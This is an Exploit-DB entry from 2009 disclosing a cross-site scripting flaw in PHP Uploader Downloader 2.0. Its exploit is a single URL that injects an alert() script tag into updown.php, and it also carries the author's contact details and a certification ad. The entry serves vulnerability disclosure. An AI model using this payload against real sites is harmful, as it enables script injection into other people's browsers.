PHP Uploader Downloader 2.0 - Cross-Site Scripting

EDB-ID:

10722

CVE:

N/A




Platform:

PHP

Date:

2009-12-26


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

========================================================================================                  
| # Title    : PHP Uploader Downloader Cross Site Scripting Vulnerability              |
| # Author   : indoushka                                                               |
| # email    : indoushka@hotmail.com                                                   |
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)       |
| # Web Site : www.iq-ty.com                                                           |
| # Script   : Powered by PHP Uploader Downloader Version 2.0 (http://www.zachwhite.com|
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       |
| # Bug      : XSS                                                                     | 
======================      Exploit By indoushka       =================================
| # Exploit  : 
| 
| 1-http://server/script_3163/updown.php/>'><ScRiPt>alert(213771818860)</ScRiPt>
|
================================   Dz-Ghost Team   ========================================
Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 |
-------------------------------------------------------------------------------------------